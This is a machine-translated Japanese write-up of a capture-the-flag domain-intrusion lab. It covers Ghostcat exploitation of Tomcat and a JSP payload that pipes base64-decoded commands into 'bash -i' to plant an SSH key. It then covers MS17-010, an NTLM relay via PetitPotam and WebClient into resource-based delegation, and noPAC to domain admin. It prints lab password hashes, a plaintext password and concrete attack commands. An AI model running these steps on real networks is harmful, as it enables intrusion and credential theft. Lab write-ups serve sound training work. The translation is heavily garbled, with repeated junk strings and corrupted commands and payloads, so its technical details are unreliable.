タイトル：春と秋のクラウドミラー - [シミュレーションシーン]スプーフィング記事

https://hacker.bz/t/entry/15286-%E3%82%BF%E3%82%A4%E3%83%88%E3%83%AB%EF%BC%9A%E6%98%A5%E3%81%A8%E7%A7%8B%E3%81%AE%E3%82%AF%E3%83%A9%E3%82%A6%E3%83%89%E3%83%9F%E3%83%A9%E3%83%BC-%E3%82%B7%E3%83%9F%E3%83%A5%E3%83%AC%E3%83%BC%E3%82%B7%E3%83%A7%E3%83%B3%E3%82%B7%E3%83%BC%E3%83%B3%E3%82%B9%E3%83%97%E3%83%BC%E3%83%95%E3%82%A3%E3%83%B3%E3%82%B0%E8%A8%98%E4%BA%8B/

Followers

0x01 - 情報

TAG: Tomcat、NTLM、WebClient、COERCE AUTHURTINATION、NOPAC

0x02 - 再

ターゲット外部IP 47.92.146.66

NMAPの結果

ポート8009（AJP）に焦点を当てることは、Tomcat（射撃範囲のTomcatタグに対応）ディレクトリスキャンを意味します。404ページはTomcat 9.0.30 として表示されます。

このプロジェクトでテストします

https://github.com/00theway/ghostcat-cnvd-2020-10487

/web-inf/web.xml を読み取ります

url-pattern結果は辞書として保存されます

FFUF

UploadServlet をフォローしてください

Temp.txt をアップロードします

ファイルアドレス./upload/7dbbdee357b4472f5aad6b8ce83980ddddddddddddddddddddddddddddddddddddd.

./upload to /uploadを交換し、アップロードされたファイルを正常に読み取ります

Python3 ajpshooter.py http://47.92.146.66:8080 8009/upload/7dbbbdee357b4472f5aad6b8ce83980dd/202212060934444444444444444444444444444444444444440839.t

0x03 - Ghostcatコマンド実行

shell.txt ％java.io.inputStream in=runtime.getRuntime（）。 {echo、zwnobyaic3nolxjzysbbqufbqjnoemfdmxljmkvbqufbrefrqujbqufcz1fdl3nkady4uk5hwktlaknqae40wuxpsnj4edr3n3n3jtbgcc FRMMTNYNHVKZLPFZM4YU25SCE9RDXQ0OE1LDURHOETDCXCZRW0ZNU9ODXXDUA2P3ZEKVRGHGN3ZSETB0T2XTWDE5NMJHCXPNDE5PM1YZUHEXC3NC mzv5ui85shj6zjvedhdqs2nkdkphv0ruzzu2uwhzjlnr21vduzvqwv2qjdsuwl3a01fnwnxtzvsqtrwum5kveh2ru1oqukxkkccc3mtbeewnkt28 rngh1tgnnvjzhdus3uxdktwdnn0oyu2u5tepgzwk2r2g0amjusgrhdmnbvvvjvvvvjzefi4qvnxsmnqy29tm2dmuee1uwnxszznznznznznznznznznznznznznznznznznznznznznznznznznznznznznznznznznznznznznznznznznznznznznznznzs r3cejwwwlfuglhchlqrqr2y1t3eruu0xqmjyr0gvtlrbynzwa3dznbkrurwdvbnnnwhofy4c09htjixczlwazfjmvbbxaeh2wdz1ejhradrndudnq lryshlzb3dutjg3otexvdvgr0vjvzlweuh1cm9fsvjtde9sy3dbymrmc0k0nvhos1o0awoxderlntrtmmpxwxhjtjhsl1zuunv2rvvotvpgoula bdm3uw5eqnbfr25ltxfjtve4chvuzujbmngvsurhmfr6mwxjvgk5whp5wjvhetd4dtjwzstidxhwt1bsq2m9iia+piavcm9vdc8uc3nol2ff1dghv CMML6ZWRFA2V5CWOKY2HTB2QGNJAWIC9YB290LY5ZC2GVYXV0AG9YAXPLZF9RZXLZCG==} | {base64、-D} | {bash、-i} "）。 int a=-1; byte [] b=new byte [2048]; out.print（ "pre"）; while（（a=in.read（b））！=-1）{out.println（new String（b））; } out.print（ "/pre"）;％

shell.txt アップロードされたコードSSH - FLAG01 を実行する

0x04 - ポータルUbuntu：172.22.11.76

SSH 何もありません。にアクセスしてエージェントを開き、3つのホスト情報をスキャンして445をスキャンします172.22.11.45 XR-Desktop.Xiaorang.Labab

172.22.11.6 Xiaorang-DC.Xiaorang.lab

172.22.11.26 XR-LCM3AE8B.XIAORANG.LAB

172.22.11.45 - Windows7 - MS17 MS17 1つのGO 基本操作に注意してください

資格リスト管理者4430C690B4C1AB3F4FE4F8AC0410DE4A - （ローカル資格情報）

John 03CAE082068E8D55EA307B75581A8859 - （ローカル資格情報）

XR-DESKTOP $ 3AA5C26B39A226AB2517D9C57EF07E3E - （ドメイン資格情報）

yangmei 25e42ef4cc0ab6a8ff9e3edbbda91841 - xrihghgonzq（プレーンテキスト） - （ドメイン資格情報）

私は組み合わせの爆破を試しました、何もありません、私はここでデモをスキップして、ドメイン侵入リンクに直接行きました

flag2 ドメインユーザーyangmeiをマシンのローカル管理者に追加するドメイン制御IPを172.22.11.6 - Xiaorang-DC Bloodhound Collection

0x05 - ドメイン浸透リンク、入学xr-desktop：172.22.11.45

これをすばやく実行しましょう（1つの文で概要：ドメインコントロールを直接削除することはできません）、Bloodhoundによって収集されたユーザー名の組み合わせを使用して取得したパスワード/ハッシュの組み合わせが爆破されました。他の新しいユーザーはMAQ=0を持っていることがわかりませんでした。コンピューターを追加できません。現在のLDAPにはTLSがなく、コンピューターをリモートで追加することはできません。インパケットの追加コンピューターには2つの方法があります。 SAMRとLDAPS。 SAMRはMAQ=0によって制限されており、コンピューターを追加できません。 LDAPSはTLS + MAQ=0で制限されています。ドメイン制御はnoPACが存在します。現在のユーザーYangmeiはNOPACを使用しており、ドメイン内のコンピューターコンテナ内のCreateChildのACLドメイン制御を殺しません。現在のユーザーYangmeiは現在のWindows Machine XR-DeskTopに手紙の許可を得ていません。つまり、DFSCoerceとPetitpotamはSamacCountNameドメインで変更できませんが、CVE-2019-1040は存在しません。 exploit:ridter/nopac: cve-2021-42278およびcve-2021-42287を悪用して、標準ドメインユーザー（github.com）petitpotamスキャン NO ADCS + Petitpotam + NTLM Leray Play Play Plye

攻撃チェーン：Petitpotamを使用して、脆弱性のターゲットをトリガーし、WebClientサービスを有効にします。 Petitpotamを使用してターゲットをトリガーして、HTTPリレーサービスにアクセスします。ターゲットは、WebClientを使用してNTLM認証を携帯してリレーにアクセスし、その認証をLDAPにリレーし、マシンアカウントのIDを取得し、マシンアカウントとして独自のMSDS-ActonBehalfofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofofoforidentity属性をマシンアカウントとして修正し、悪意のあるマシンアカウントがターゲットマシン（RBCD）へのアクセスをシミュレートして認証できるようにします。ターゲットマシンは、WebClientサービスを有効にする必要があります。

WebClientスキャン、そしてそれが勝つことしかできないことが確認されています。 172.22.11.26（XR-LCM3AE8B）リレー攻撃序文：実際の戦闘でのリレープレイは、80の占有サービスを停止し、ポート転送を有効にする必要があり、CSは後続のバージョンでRPORTFWD_LOCOLを追加し、クライアントローカルに直接転送します）。このデモンストレーションは、実際の戦闘プレイに似ています。入り口ubuntuにインパケットを投げることは選択しません。この操作リレー攻撃環境は:ポート転送+プロキシを構成します

現在、サーバーの80をローカルクライアントの80に転送する必要があります。SSHのリバースポート転送は127.0.0.1にしかリストであるため、現時点ではいくつかのトリックが必要です。

図に示すように、リバースポートフォワードポート79がすべてを聞くように指定している場合でも（-R \*:793360127.0.0.1:80）、ポート79はまだ127.0.0.1に結合しています（Socks5プロキシも図）

余分なソサットを追加して、トラフィックを0.0.0.0336080に127.0.0.1336079に転送し、クライアント側のローカル80に戻し、80を0.0.0.0 で変装させてリッスンします。

テスト、172.22.11.76:80からのトラフィックは、地元のエリアに直接転送されます

NTLMRELAYXを開くローカル注：前述のようにLDAPSがないため、addComputerを使用することはできないため、IPを使用してRBCDSUDO ProxyChainsを設定した後、IPを使用してDCに接続することはできません。 -NO-ACL -ESCALATE-USER 'XR-DESKTOP $' - DELEGATE-ACCESS Petitpotamを使用してXR-LCM3AE8Bを172.22.11.76（Ubuntu）ProxyChains4 -F〜/htb/htb/htb/htb/htb/htb/htb/spopychingにトリガーしますpetitpotam.py -u yangmei -p 'xrihghgonzq' -d xiaorang.lab ubuntu@80/pwn.txt xr -lcm3ae8b

RBCD攻撃が完了していることがわかります。次のステップは、XR-LCM3AE8Bの銀行ノートを直接申請することです。 XR-LCM3AE8B CIFS Notes に応募します

0x06 - ドメイン浸透リンク - NOPAC、入り口XR-LCM3AE8B：172.22.11.26

PSEXECFLAG03 IN C: \ USERS \ Administrator \ flag \ flag03.txt（ここにスクリーンショットなし）SMBCLIENT.py 1232126B24CDF8C9BD2F788A9D7C7ED1

Zhanghuiだけが成功することができます。 Zhanghuiは、MA_ADMINグループにオブジェクトを作成できます。 MA_ADMINグループはコンピューター用のオブジェクトを作成できますが、BloodHound -B 'CN=コンピューター、DC=Xiaorang、DC=lab' ntsecuritydescriptor -sddl +++ にadfind.exeは表示されませんでした。

Bloodhoundを見ることができません。主な理由は、CreateChildがJSON に収集されず、NOPACに戻り、さらにCreate-Childパラメーターに戻ったことです。

0x07 - ドメイン浸透リンク - Xiaorang-DC

NOPACが適用したCIFSチケットを使用して、DCFLAG04にログインします。 c: \ uses \ administrator \ flag \ flag04.txt（ここにスクリーンショットはありません）ドメインチューブ（Mimikatzを使用してスキップ）管理者0FADB57F5EC71437D1B03EEA2CDA70B9